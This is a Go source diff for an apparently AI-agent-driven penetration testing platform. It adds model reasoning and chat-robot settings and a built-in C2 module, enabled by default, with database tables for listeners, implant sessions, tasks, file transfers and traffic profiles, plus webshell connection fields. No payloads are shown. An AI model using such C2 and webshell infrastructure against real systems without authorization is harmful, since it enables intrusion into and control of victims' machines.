||||
}
|
||||
|
||||
func (c MultiAgentEinoCallbacksOtelConfig) SampleRatioEffective() float64 {
|
||||
r := c.SampleRatio
|
||||
if r <= 0 {
|
||||
return 1.0
|
||||
}
|
||||
if r > 1 {
|
||||
return 1.0
|
||||
}
|
||||
return r
|
||||
}
|
||||
|
||||
func (c MultiAgentEinoCallbacksConfig) EinoCallbacksMaxInputSummaryRunes() int {
|
||||
if c.MaxInputSummaryRunes > 0 {
|
||||
return c.MaxInputSummaryRunes
|
||||
}
|
||||
return 400
|
||||
}
|
||||
|
||||
func (c MultiAgentEinoCallbacksConfig) EinoCallbacksMaxOutputSummaryRunes() int {
|
||||
if c.MaxOutputSummaryRunes > 0 {
|
||||
return c.MaxOutputSummaryRunes
|
||||
}
|
||||
return 400
|
||||
}
|
||||
|
||||
// MultiAgentEinoMiddlewareConfig optional Eino ADK middleware and Deep / supervisor tuning.
|
||||
@@ -89,7 +210,8 @@ type MultiAgentEinoMiddlewareConfig struct {
|
||||
SummarizationTriggerRatio float64 `yaml:"summarization_trigger_ratio,omitempty" json:"summarization_trigger_ratio,omitempty"`
|
||||
// SummarizationEmitInternalEvents controls middleware internal event emission (default true).
|
||||
SummarizationEmitInternalEvents *bool `yaml:"summarization_emit_internal_events,omitempty" json:"summarization_emit_internal_events,omitempty"`
|
||||
// HistoryInputBudgetRatio caps pre-agent history tokens as max_total_tokens * ratio (default 0.35).
|
||||
// HistoryInputBudgetRatio 已不影响 Eino:从 last_react 轨迹转 ADK 消息时**不再**按 token 比例裁剪(完整注入)。
|
||||
// 字段仍保留,便于旧版 config 不报错;新部署可省略。
|
||||
HistoryInputBudgetRatio float64 `yaml:"history_input_budget_ratio,omitempty" json:"history_input_budget_ratio,omitempty"`
|
||||
// PlanExecuteUserInputBudgetRatio caps planner/replanner/executor userInput prompt budget ratio (default 0.35).
|
||||
PlanExecuteUserInputBudgetRatio float64 `yaml:"plan_execute_user_input_budget_ratio,omitempty" json:"plan_execute_user_input_budget_ratio,omitempty"`
|
||||
@@ -269,16 +391,31 @@ type MultiAgentAPIUpdate struct {
|
||||
RobotUseMultiAgent bool `json:"robot_use_multi_agent"`
|
||||
BatchUseMultiAgent bool `json:"batch_use_multi_agent"`
|
||||
PlanExecuteLoopMaxIterations *int `json:"plan_execute_loop_max_iterations,omitempty"`
|
||||
ToolSearchAlwaysVisibleTools []string `json:"tool_search_always_visible_tools,omitempty"`
|
||||
// 指针区分「JSON 未传该字段」与「传空数组要清空」;省略时不应覆盖 YAML 中的常驻工具白名单。
|
||||
ToolSearchAlwaysVisibleTools *[]string `json:"tool_search_always_visible_tools,omitempty"`
|
||||
}
|
||||
|
||||
// RobotsConfig 机器人配置(企业微信、钉钉、飞书等)
|
||||
type RobotsConfig struct {
|
||||
Session RobotSessionConfig `yaml:"session,omitempty" json:"session,omitempty"` // 机器人会话隔离策略
|
||||
Wecom RobotWecomConfig `yaml:"wecom,omitempty" json:"wecom,omitempty"` // 企业微信
|
||||
Dingtalk RobotDingtalkConfig `yaml:"dingtalk,omitempty" json:"dingtalk,omitempty"` // 钉钉
|
||||
Lark RobotLarkConfig `yaml:"lark,omitempty" json:"lark,omitempty"` // 飞书
|
||||
}
|
||||
|
||||
// RobotSessionConfig 机器人会话隔离策略
|
||||
type RobotSessionConfig struct {
|
||||
StrictUserIdentity *bool `yaml:"strict_user_identity,omitempty" json:"strict_user_identity,omitempty"` // true 时只允许真实用户标识,不允许会话/群 ID 兜底
|
||||
}
|
||||
|
||||
// StrictUserIdentityEnabled 返回是否启用严格用户身份模式;未配置时默认 true。
|
||||
func (c RobotSessionConfig) StrictUserIdentityEnabled() bool {
|
||||
if c.StrictUserIdentity == nil {
|
||||
return true
|
||||
}
|
||||
return *c.StrictUserIdentity
|
||||
}
|
||||
|
||||
// RobotWecomConfig 企业微信机器人配置
|
||||
type RobotWecomConfig struct {
|
||||
Enabled bool `yaml:"enabled" json:"enabled"`
|
||||
@@ -291,17 +428,19 @@ type RobotWecomConfig struct {
|
||||
|
||||
// RobotDingtalkConfig 钉钉机器人配置
|
||||
type RobotDingtalkConfig struct {
|
||||
Enabled bool `yaml:"enabled" json:"enabled"`
|
||||
ClientID string `yaml:"client_id" json:"client_id"` // 应用 Key (AppKey)
|
||||
ClientSecret string `yaml:"client_secret" json:"client_secret"` // 应用 Secret
|
||||
Enabled bool `yaml:"enabled" json:"enabled"`
|
||||
ClientID string `yaml:"client_id" json:"client_id"` // 应用 Key (AppKey)
|
||||
ClientSecret string `yaml:"client_secret" json:"client_secret"` // 应用 Secret
|
||||
AllowConversationIDFallback bool `yaml:"allow_conversation_id_fallback" json:"allow_conversation_id_fallback"` // sender_id 缺失时是否允许回退到会话 ID
|
||||
}
|
||||
|
||||
// RobotLarkConfig 飞书机器人配置
|
||||
type RobotLarkConfig struct {
|
||||
Enabled bool `yaml:"enabled" json:"enabled"`
|
||||
AppID string `yaml:"app_id" json:"app_id"` // 应用 App ID
|
||||
AppSecret string `yaml:"app_secret" json:"app_secret"` // 应用 App Secret
|
||||
VerifyToken string `yaml:"verify_token" json:"verify_token"` // 事件订阅 Verification Token(可选)
|
||||
Enabled bool `yaml:"enabled" json:"enabled"`
|
||||
AppID string `yaml:"app_id" json:"app_id"` // 应用 App ID
|
||||
AppSecret string `yaml:"app_secret" json:"app_secret"` // 应用 App Secret
|
||||
VerifyToken string `yaml:"verify_token" json:"verify_token"` // 事件订阅 Verification Token(可选)
|
||||
AllowChatIDFallback bool `yaml:"allow_chat_id_fallback" json:"allow_chat_id_fallback"` // 用户 ID 缺失时是否允许回退到 chat_id
|
||||
}
|
||||
|
||||
type ServerConfig struct {
|
||||
@@ -328,6 +467,48 @@ type OpenAIConfig struct {
|
||||
BaseURL string `yaml:"base_url" json:"base_url"`
|
||||
Model string `yaml:"model" json:"model"`
|
||||
MaxTotalTokens int `yaml:"max_total_tokens,omitempty" json:"max_total_tokens,omitempty"`
|
||||
// Reasoning 控制 Eino ChatModel 的 thinking / reasoning_effort / output_config 等(仅 Eino 路径生效;原生 ReAct 忽略)。
|
||||
Reasoning OpenAIReasoningConfig `yaml:"reasoning,omitempty" json:"reasoning,omitempty"`
|
||||
}
|
||||
|
||||
// OpenAIReasoningConfig 全局默认与网关 profile(对话页可通过 ChatRequest.reasoning 覆盖,受 AllowClientReasoning 约束)。
|
||||
type OpenAIReasoningConfig struct {
|
||||
// Mode: auto(默认)| on | off | default(与 auto 相同)。off 时不向模型附加推理扩展字段。
|
||||
Mode string `yaml:"mode,omitempty" json:"mode,omitempty"`
|
||||
// Effort: low | medium | high | max;空表示不单独指定强度(各 profile 行为见 internal/reasoning)。
|
||||
Effort string `yaml:"effort,omitempty" json:"effort,omitempty"`
|
||||
// AllowClientReasoning 为 false 时忽略请求体 reasoning;nil 或未设置等同于 true。
|
||||
AllowClientReasoning *bool `yaml:"allow_client_reasoning,omitempty" json:"allow_client_reasoning,omitempty"`
|
||||
// Profile: auto | deepseek_compat | openai_compat | output_config_effort
|
||||
Profile string `yaml:"profile,omitempty" json:"profile,omitempty"`
|
||||
// ExtraRequestFields 合并进 Chat Completions 根 JSON(管理员用;与自动字段同名时后者覆盖)。
|
||||
ExtraRequestFields map[string]interface{} `yaml:"extra_request_fields,omitempty" json:"extra_request_fields,omitempty"`
|
||||
}
|
||||
|
||||
// ModeEffective returns auto when empty or default.
|
||||
func (c OpenAIReasoningConfig) ModeEffective() string {
|
||||
m := strings.ToLower(strings.TrimSpace(c.Mode))
|
||||
if m == "" || m == "default" {
|
||||
return "auto"
|
||||
}
|
||||
return m
|
||||
}
|
||||
|
||||
// ProfileEffective returns auto when empty.
|
||||
func (c OpenAIReasoningConfig) ProfileEffective() string {
|
||||
p := strings.ToLower(strings.TrimSpace(c.Profile))
|
||||
if p == "" {
|
||||
return "auto"
|
||||
}
|
||||
return p
|
||||
}
|
||||
|
||||
// AllowClientReasoningEffective true when client may send ChatRequest.reasoning.
|
||||
func (c OpenAIReasoningConfig) AllowClientReasoningEffective() bool {
|
||||
if c.AllowClientReasoning == nil {
|
||||
return true
|
||||
}
|
||||
return *c.AllowClientReasoning
|
||||
}
|
||||
|
||||
type FofaConfig struct {
|
||||
@@ -464,7 +645,6 @@ func Load(path string) (*Config, error) {
|
||||
if cfg.Auth.SessionDurationHours <= 0 {
|
||||
cfg.Auth.SessionDurationHours = 12
|
||||
}
|
||||
|
||||
if strings.TrimSpace(cfg.Auth.Password) == "" {
|
||||
password, err := generateStrongPassword(24)
|
||||
if err != nil {
|
||||
@@ -933,6 +1113,7 @@ func LoadRoleFromFile(path string) (*RoleConfig, error) {
|
||||
}
|
||||
|
||||
func Default() *Config {
|
||||
strictRobotIdentity := true
|
||||
return &Config{
|
||||
Server: ServerConfig{
|
||||
Host: "0.0.0.0",
|
||||
@@ -967,6 +1148,11 @@ func Default() *Config {
|
||||
Auth: AuthConfig{
|
||||
SessionDurationHours: 12,
|
||||
},
|
||||
Robots: RobotsConfig{
|
||||
Session: RobotSessionConfig{
|
||||
StrictUserIdentity: &strictRobotIdentity,
|
||||
},
|
||||
},
|
||||
Knowledge: KnowledgeConfig{
|
||||
Enabled: true,
|
||||
BasePath: "knowledge_base",
|
||||
@@ -997,6 +1183,35 @@ func Default() *Config {
|
||||
}
|
||||
}
|
||||
|
||||
// C2Config 内置 C2 模块开关(与知识库 enabled 语义一致:关闭后不初始化监听器、不注册 C2 MCP 工具)。
|
||||
type C2Config struct {
|
||||
// Enabled 为 nil 表示未写配置,按 true 处理(兼容旧 config.yaml)
|
||||
Enabled *bool `yaml:"enabled,omitempty" json:"enabled,omitempty"`
|
||||
}
|
||||
|
||||
// EnabledEffective 返回是否启用 C2;未显式配置时默认启用。
|
||||
func (c C2Config) EnabledEffective() bool {
|
||||
if c.Enabled == nil {
|
||||
return true
|
||||
}
|
||||
return *c.Enabled
|
||||
}
|
||||
|
||||
// C2Public 返回给前端的 C2 状态(仅标量)。
|
||||
type C2Public struct {
|
||||
Enabled bool `json:"enabled"`
|
||||
}
|
||||
|
||||
// Public 将内部配置转为 API 响应。
|
||||
func (c C2Config) Public() C2Public {
|
||||
return C2Public{Enabled: c.EnabledEffective()}
|
||||
}
|
||||
|
||||
// C2APIUpdate 设置页/API 更新 C2 开关。
|
||||
type C2APIUpdate struct {
|
||||
Enabled bool `json:"enabled"`
|
||||
}
|
||||
|
||||
// KnowledgeConfig 知识库配置
|
||||
type KnowledgeConfig struct {
|
||||
Enabled bool `yaml:"enabled" json:"enabled"` // 是否启用知识检索
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
@@ -25,13 +25,15 @@ type Conversation struct {
|
||||
|
||||
// Message 消息
|
||||
type Message struct {
|
||||
ID string `json:"id"`
|
||||
ConversationID string `json:"conversationId"`
|
||||
Role string `json:"role"`
|
||||
Content string `json:"content"`
|
||||
MCPExecutionIDs []string `json:"mcpExecutionIds,omitempty"`
|
||||
ProcessDetails []map[string]interface{} `json:"processDetails,omitempty"`
|
||||
CreatedAt time.Time `json:"createdAt"`
|
||||
ID string `json:"id"`
|
||||
ConversationID string `json:"conversationId"`
|
||||
Role string `json:"role"`
|
||||
Content string `json:"content"`
|
||||
ReasoningContent string `json:"reasoningContent,omitempty"`
|
||||
MCPExecutionIDs []string `json:"mcpExecutionIds,omitempty"`
|
||||
ProcessDetails []map[string]interface{} `json:"processDetails,omitempty"`
|
||||
CreatedAt time.Time `json:"createdAt"`
|
||||
UpdatedAt time.Time `json:"updatedAt"`
|
||||
}
|
||||
|
||||
// CreateConversation 创建新对话
|
||||
@@ -484,6 +486,7 @@ func (db *DB) ConversationHasToolProcessDetails(conversationID string) (bool, er
|
||||
// AddMessage 添加消息
|
||||
func (db *DB) AddMessage(conversationID, role, content string, mcpExecutionIDs []string) (*Message, error) {
|
||||
id := uuid.New().String()
|
||||
now := time.Now()
|
||||
|
||||
var mcpIDsJSON string
|
||||
if len(mcpExecutionIDs) > 0 {
|
||||
@@ -496,8 +499,8 @@ func (db *DB) AddMessage(conversationID, role, content string, mcpExecutionIDs [
|
||||
}
|
||||
|
||||
_, err := db.Exec(
|
||||
"INSERT INTO messages (id, conversation_id, role, content, mcp_execution_ids, created_at) VALUES (?, ?, ?, ?, ?, ?)",
|
||||
id, conversationID, role, content, mcpIDsJSON, time.Now(),
|
||||
"INSERT INTO messages (id, conversation_id, role, content, reasoning_content, mcp_execution_ids, created_at, updated_at) VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
|
||||
id, conversationID, role, content, "", mcpIDsJSON, now, now,
|
||||
)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("添加消息失败: %w", err)
|
||||
@@ -514,16 +517,37 @@ func (db *DB) AddMessage(conversationID, role, content string, mcpExecutionIDs [
|
||||
Role: role,
|
||||
Content: content,
|
||||
MCPExecutionIDs: mcpExecutionIDs,
|
||||
CreatedAt: time.Now(),
|
||||
CreatedAt: now,
|
||||
UpdatedAt: now,
|
||||
}
|
||||
|
||||
return message, nil
|
||||
}
|
||||
|
||||
// UpdateAssistantMessageFinalize 更新助手消息终态(正文、MCP id、思考链聚合文本,供无轨迹回退时回放)。
|
||||
func (db *DB) UpdateAssistantMessageFinalize(messageID, content string, mcpExecutionIDs []string, reasoningContent string) error {
|
||||
var mcpIDsJSON string
|
||||
if len(mcpExecutionIDs) > 0 {
|
||||
jsonData, err := json.Marshal(mcpExecutionIDs)
|
||||
if err != nil {
|
||||
return fmt.Errorf("序列化MCP执行ID失败: %w", err)
|
||||
}
|
||||
mcpIDsJSON = string(jsonData)
|
||||
}
|
||||
_, err := db.Exec(
|
||||
"UPDATE messages SET content = ?, mcp_execution_ids = ?, reasoning_content = ?, updated_at = ? WHERE id = ?",
|
||||
content, mcpIDsJSON, strings.TrimSpace(reasoningContent), time.Now(), messageID,
|
||||
)
|
||||
if err != nil {
|
||||
return fmt.Errorf("更新助手消息失败: %w", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// GetMessages 获取对话的所有消息
|
||||
func (db *DB) GetMessages(conversationID string) ([]Message, error) {
|
||||
rows, err := db.Query(
|
||||
"SELECT id, conversation_id, role, content, mcp_execution_ids, created_at FROM messages WHERE conversation_id = ? ORDER BY created_at ASC",
|
||||
"SELECT id, conversation_id, role, content, reasoning_content, mcp_execution_ids, created_at, updated_at FROM messages WHERE conversation_id = ? ORDER BY created_at ASC",
|
||||
conversationID,
|
||||
)
|
||||
if err != nil {
|
||||
@@ -534,12 +558,17 @@ func (db *DB) GetMessages(conversationID string) ([]Message, error) {
|
||||
var messages []Message
|
||||
for rows.Next() {
|
||||
var msg Message
|
||||
var reasoning sql.NullString
|
||||
var mcpIDsJSON sql.NullString
|
||||
var createdAt string
|
||||
var updatedAt sql.NullString
|
||||
|
||||
if err := rows.Scan(&msg.ID, &msg.ConversationID, &msg.Role, &msg.Content, &mcpIDsJSON, &createdAt); err != nil {
|
||||
if err := rows.Scan(&msg.ID, &msg.ConversationID, &msg.Role, &msg.Content, &reasoning, &mcpIDsJSON, &createdAt, &updatedAt); err != nil {
|
||||
return nil, fmt.Errorf("扫描消息失败: %w", err)
|
||||
}
|
||||
if reasoning.Valid {
|
||||
msg.ReasoningContent = reasoning.String
|
||||
}
|
||||
|
||||
// 尝试多种时间格式解析
|
||||
var err error
|
||||
@@ -551,6 +580,20 @@ func (db *DB) GetMessages(conversationID string) ([]Message, error) {
|
||||
msg.CreatedAt, _ = time.Parse(time.RFC3339, createdAt)
|
||||
}
|
||||
|
||||
// updated_at 兼容老库:字段不存在/为空时回退为 created_at
|
||||
if updatedAt.Valid && strings.TrimSpace(updatedAt.String) != "" {
|
||||
msg.UpdatedAt, err = time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt.String)
|
||||
if err != nil {
|
||||
msg.UpdatedAt, err = time.Parse("2006-01-02 15:04:05", updatedAt.String)
|
||||
}
|
||||
if err != nil {
|
||||
msg.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt.String)
|
||||
}
|
||||
}
|
||||
if msg.UpdatedAt.IsZero() {
|
||||
msg.UpdatedAt = msg.CreatedAt
|
||||
}
|
||||
|
||||
// 解析MCP执行ID
|
||||
if mcpIDsJSON.Valid && mcpIDsJSON.String != "" {
|
||||
if err := json.Unmarshal([]byte(mcpIDsJSON.String), &msg.MCPExecutionIDs); err != nil {
|
||||
@@ -665,7 +708,7 @@ type ProcessDetail struct {
|
||||
ID string `json:"id"`
|
||||
MessageID string `json:"messageId"`
|
||||
ConversationID string `json:"conversationId"`
|
||||
EventType string `json:"eventType"` // iteration, thinking, tool_calls_detected, tool_call, tool_result, progress, error
|
||||
EventType string `json:"eventType"` // iteration, thinking, reasoning_chain, tool_calls_detected, tool_call, tool_result, progress, error
|
||||
Message string `json:"message"`
|
||||
Data string `json:"data"` // JSON格式的数据
|
||||
CreatedAt time.Time `json:"createdAt"`
|
||||
|
||||
@@ -82,6 +82,7 @@ func (db *DB) initTables() error {
|
||||
content TEXT NOT NULL,
|
||||
mcp_execution_ids TEXT,
|
||||
created_at DATETIME NOT NULL,
|
||||
updated_at DATETIME NOT NULL,
|
||||
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE
|
||||
);`
|
||||
|
||||
@@ -202,6 +203,16 @@ func (db *DB) initTables() error {
|
||||
UNIQUE(conversation_id, group_id)
|
||||
);`
|
||||
|
||||
// 机器人会话绑定表(用于跨重启保持「平台+租户+用户」到 conversation 的映射)
|
||||
createRobotUserSessionsTable := `
|
||||
CREATE TABLE IF NOT EXISTS robot_user_sessions (
|
||||
session_key TEXT PRIMARY KEY,
|
||||
conversation_id TEXT NOT NULL,
|
||||
role_name TEXT NOT NULL DEFAULT '默认',
|
||||
updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
|
||||
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE
|
||||
);`
|
||||
|
||||
// 创建漏洞表
|
||||
createVulnerabilitiesTable := `
|
||||
CREATE TABLE IF NOT EXISTS vulnerabilities (
|
||||
@@ -269,6 +280,8 @@ func (db *DB) initTables() error {
|
||||
method TEXT NOT NULL DEFAULT 'post',
|
||||
cmd_param TEXT NOT NULL DEFAULT '',
|
||||
remark TEXT NOT NULL DEFAULT '',
|
||||
encoding TEXT NOT NULL DEFAULT '',
|
||||
os TEXT NOT NULL DEFAULT '',
|
||||
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP
|
||||
);`
|
||||
|
||||
@@ -281,6 +294,113 @@ func (db *DB) initTables() error {
|
||||
FOREIGN KEY (connection_id) REFERENCES webshell_connections(id) ON DELETE CASCADE
|
||||
);`
|
||||
|
||||
// ========================================================================
|
||||
// C2 模块(监听器 / 会话 / 任务 / 文件 / 事件 / Malleable Profile)
|
||||
// ========================================================================
|
||||
createC2ListenersTable := `
|
||||
CREATE TABLE IF NOT EXISTS c2_listeners (
|
||||
id TEXT PRIMARY KEY,
|
||||
name TEXT NOT NULL,
|
||||
type TEXT NOT NULL,
|
||||
bind_host TEXT NOT NULL DEFAULT '127.0.0.1',
|
||||
bind_port INTEGER NOT NULL,
|
||||
profile_id TEXT,
|
||||
encryption_key TEXT NOT NULL DEFAULT '',
|
||||
implant_token TEXT NOT NULL DEFAULT '',
|
||||
status TEXT NOT NULL DEFAULT 'stopped',
|
||||
config_json TEXT NOT NULL DEFAULT '{}',
|
||||
remark TEXT NOT NULL DEFAULT '',
|
||||
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
|
||||
started_at DATETIME,
|
||||
last_error TEXT
|
||||
);`
|
||||
|
||||
createC2SessionsTable := `
|
||||
CREATE TABLE IF NOT EXISTS c2_sessions (
|
||||
id TEXT PRIMARY KEY,
|
||||
listener_id TEXT NOT NULL,
|
||||
implant_uuid TEXT NOT NULL UNIQUE,
|
||||
hostname TEXT,
|
||||
username TEXT,
|
||||
os TEXT,
|
||||
arch TEXT,
|
||||
pid INTEGER DEFAULT 0,
|
||||
process_name TEXT,
|
||||
is_admin INTEGER DEFAULT 0,
|
||||
internal_ip TEXT,
|
||||
external_ip TEXT,
|
||||
user_agent TEXT,
|
||||
sleep_seconds INTEGER NOT NULL DEFAULT 5,
|
||||
jitter_percent INTEGER NOT NULL DEFAULT 0,
|
||||
status TEXT NOT NULL DEFAULT 'active',
|
||||
first_seen_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
|
||||
last_check_in DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
|
||||
metadata_json TEXT DEFAULT '{}',
|
||||
note TEXT NOT NULL DEFAULT '',
|
||||
FOREIGN KEY (listener_id) REFERENCES c2_listeners(id) ON DELETE CASCADE
|
||||
);`
|
||||
|
||||
createC2TasksTable := `
|
||||
CREATE TABLE IF NOT EXISTS c2_tasks (
|
||||
id TEXT PRIMARY KEY,
|
||||
session_id TEXT NOT NULL,
|
||||
task_type TEXT NOT NULL,
|
||||
payload_json TEXT NOT NULL DEFAULT '{}',
|
||||
status TEXT NOT NULL DEFAULT 'queued',
|
||||
result_text TEXT,
|
||||
result_blob_path TEXT,
|
||||
error TEXT,
|
||||
source TEXT NOT NULL DEFAULT 'manual',
|
||||
conversation_id TEXT,
|
||||
approval_status TEXT,
|
||||
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
|
||||
sent_at DATETIME,
|
||||
started_at DATETIME,
|
||||
completed_at DATETIME,
|
||||
duration_ms INTEGER DEFAULT 0,
|
||||
FOREIGN KEY (session_id) REFERENCES c2_sessions(id) ON DELETE CASCADE
|
||||
);`
|
||||
|
||||
createC2FilesTable := `
|
||||
CREATE TABLE IF NOT EXISTS c2_files (
|
||||
id TEXT PRIMARY KEY,
|
||||
session_id TEXT NOT NULL,
|
||||
task_id TEXT,
|
||||
direction TEXT NOT NULL,
|
||||
remote_path TEXT NOT NULL,
|
||||
local_path TEXT NOT NULL,
|
||||
size_bytes INTEGER DEFAULT 0,
|
||||
sha256 TEXT,
|
||||
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
|
||||
FOREIGN KEY (session_id) REFERENCES c2_sessions(id) ON DELETE CASCADE
|
||||
);`
|
||||
|
||||
createC2EventsTable := `
|
||||
CREATE TABLE IF NOT EXISTS c2_events (
|
||||
id TEXT PRIMARY KEY,
|
||||
level TEXT NOT NULL DEFAULT 'info',
|
||||
category TEXT NOT NULL,
|
||||
session_id TEXT,
|
||||
task_id TEXT,
|
||||
message TEXT NOT NULL,
|
||||
data_json TEXT,
|
||||
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP
|
||||
);`
|
||||
|
||||
createC2ProfilesTable := `
|
||||
CREATE TABLE IF NOT EXISTS c2_profiles (
|
||||
id TEXT PRIMARY KEY,
|
||||
name TEXT NOT NULL UNIQUE,
|
||||
user_agent TEXT,
|
||||
uris_json TEXT NOT NULL DEFAULT '[]',
|
||||
request_headers_json TEXT,
|
||||
response_headers_json TEXT,
|
||||
body_template TEXT,
|
||||
jitter_min_ms INTEGER DEFAULT 0,
|
||||
jitter_max_ms INTEGER DEFAULT 0,
|
||||
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP
|
||||
);`
|
||||
|
||||
// 创建索引
|
||||
createIndexes := `
|
||||
CREATE INDEX IF NOT EXISTS idx_messages_conversation_id ON messages(conversation_id);
|
||||
@@ -299,6 +419,7 @@ func (db *DB) initTables() error {
|
||||
CREATE INDEX IF NOT EXISTS idx_knowledge_retrieval_logs_created_at ON knowledge_retrieval_logs(created_at);
|
||||
CREATE INDEX IF NOT EXISTS idx_conversation_group_mappings_conversation ON conversation_group_mappings(conversation_id);
|
||||
CREATE INDEX IF NOT EXISTS idx_conversation_group_mappings_group ON conversation_group_mappings(group_id);
|
||||
CREATE INDEX IF NOT EXISTS idx_robot_user_sessions_updated_at ON robot_user_sessions(updated_at);
|
||||
CREATE INDEX IF NOT EXISTS idx_conversations_pinned ON conversations(pinned);
|
||||
CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_id ON vulnerabilities(conversation_id);
|
||||
CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_tag ON vulnerabilities(conversation_tag);
|
||||
@@ -311,6 +432,19 @@ func (db *DB) initTables() error {
|
||||
CREATE INDEX IF NOT EXISTS idx_batch_task_queues_title ON batch_task_queues(title);
|
||||
CREATE INDEX IF NOT EXISTS idx_webshell_connections_created_at ON webshell_connections(created_at);
|
||||
CREATE INDEX IF NOT EXISTS idx_webshell_connection_states_updated_at ON webshell_connection_states(updated_at);
|
||||
CREATE INDEX IF NOT EXISTS idx_c2_listeners_created_at ON c2_listeners(created_at);
|
||||
CREATE INDEX IF NOT EXISTS idx_c2_listeners_status ON c2_listeners(status);
|
||||
CREATE INDEX IF NOT EXISTS idx_c2_sessions_listener ON c2_sessions(listener_id);
|
||||
CREATE INDEX IF NOT EXISTS idx_c2_sessions_status ON c2_sessions(status);
|
||||
CREATE INDEX IF NOT EXISTS idx_c2_sessions_last_check_in ON c2_sessions(last_check_in);
|
||||
CREATE INDEX IF NOT EXISTS idx_c2_tasks_session ON c2_tasks(session_id);
|
||||
CREATE INDEX IF NOT EXISTS idx_c2_tasks_status ON c2_tasks(status);
|
||||
CREATE INDEX IF NOT EXISTS idx_c2_tasks_created_at ON c2_tasks(created_at);
|
||||
CREATE INDEX IF NOT EXISTS idx_c2_tasks_conversation ON c2_tasks(conversation_id);
|
||||
CREATE INDEX IF NOT EXISTS idx_c2_files_session ON c2_files(session_id);
|
||||
CREATE INDEX IF NOT EXISTS idx_c2_events_created_at ON c2_events(created_at);
|
||||
CREATE INDEX IF NOT EXISTS idx_c2_events_category ON c2_events(category);
|
||||
CREATE INDEX IF NOT EXISTS idx_c2_events_session ON c2_events(session_id);
|
||||
`
|
||||
|
||||
if _, err := db.Exec(createConversationsTable); err != nil {
|
||||
@@ -356,6 +490,9 @@ func (db *DB) initTables() error {
|
||||
if _, err := db.Exec(createConversationGroupMappingsTable); err != nil {
|
||||
return fmt.Errorf("创建conversation_group_mappings表失败: %w", err)
|
||||
}
|
||||
if _, err := db.Exec(createRobotUserSessionsTable); err != nil {
|
||||
return fmt.Errorf("创建robot_user_sessions表失败: %w", err)
|
||||
}
|
||||
|
||||
if _, err := db.Exec(createVulnerabilitiesTable); err != nil {
|
||||
return fmt.Errorf("创建vulnerabilities表失败: %w", err)
|
||||
@@ -377,12 +514,30 @@ func (db *DB) initTables() error {
|
||||
return fmt.Errorf("创建webshell_connection_states表失败: %w", err)
|
||||
}
|
||||
|
||||
for tableName, ddl := range map[string]string{
|
||||
"c2_listeners": createC2ListenersTable,
|
||||
"c2_sessions": createC2SessionsTable,
|
||||
"c2_tasks": createC2TasksTable,
|
||||
"c2_files": createC2FilesTable,
|
||||
"c2_events": createC2EventsTable,
|
||||
"c2_profiles": createC2ProfilesTable,
|
||||
} {
|
||||
if _, err := db.Exec(ddl); err != nil {
|
||||
return fmt.Errorf("创建%s表失败: %w", tableName, err)
|
||||
}
|
||||
}
|
||||
|
||||
// 为已有表添加新字段(如果不存在)- 必须在创建索引之前
|
||||
if err := db.migrateConversationsTable(); err != nil {
|
||||
db.logger.Warn("迁移conversations表失败", zap.Error(err))
|
||||
// 不返回错误,允许继续运行
|
||||
}
|
||||
|
||||
if err := db.migrateMessagesTable(); err != nil {
|
||||
db.logger.Warn("迁移messages表失败", zap.Error(err))
|
||||
// 不返回错误,允许继续运行
|
||||
}
|
||||
|
||||
if err := db.migrateConversationGroupsTable(); err != nil {
|
||||
db.logger.Warn("迁移conversation_groups表失败", zap.Error(err))
|
||||
// 不返回错误,允许继续运行
|
||||
@@ -402,6 +557,11 @@ func (db *DB) initTables() error {
|
||||
// 不返回错误,允许继续运行
|
||||
}
|
||||
|
||||
if err := db.migrateWebshellConnectionsTable(); err != nil {
|
||||
db.logger.Warn("迁移webshell_connections表失败", zap.Error(err))
|
||||
// 不返回错误,允许继续运行
|
||||
}
|
||||
|
||||
if _, err := db.Exec(createIndexes); err != nil {
|
||||
return fmt.Errorf("创建索引失败: %w", err)
|
||||
}
|
||||
@@ -410,6 +570,52 @@ func (db *DB) initTables() error {
|
||||
return nil
|
||||
}
|
||||
|
||||
// migrateMessagesTable 迁移 messages 表,补充 updated_at 字段。
|
||||
// 语义:updated_at 表示该条消息最后一次被写入/更新的时间(例如助手占位消息在任务结束时更新正文)。
|
||||
func (db *DB) migrateMessagesTable() error {
|
||||
var count int
|
||||
err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info('messages') WHERE name='updated_at'").Scan(&count)
|
||||
if err != nil {
|
||||
// 如果查询失败,尝试添加字段
|
||||
if _, addErr := db.Exec("ALTER TABLE messages ADD COLUMN updated_at DATETIME"); addErr != nil {
|
||||
errMsg := strings.ToLower(addErr.Error())
|
||||
if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") {
|
||||
return fmt.Errorf("添加 messages.updated_at 字段失败: %w", addErr)
|
||||
}
|
||||
}
|
||||
} else if count == 0 {
|
||||
if _, err := db.Exec("ALTER TABLE messages ADD COLUMN updated_at DATETIME"); err != nil {
|
||||
errMsg := strings.ToLower(err.Error())
|
||||
if !strings.Contains(errMsg, "duplicate column") && !strings.Contains(errMsg, "already exists") {
|
||||
return fmt.Errorf("添加 messages.updated_at 字段失败: %w", err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 回填已有数据:让 updated_at 至少等于 created_at,避免前端出现空/当前时间回退。
|
||||
_, _ = db.Exec("UPDATE messages SET updated_at = created_at WHERE updated_at IS NULL OR updated_at = ''")
|
||||
|
||||
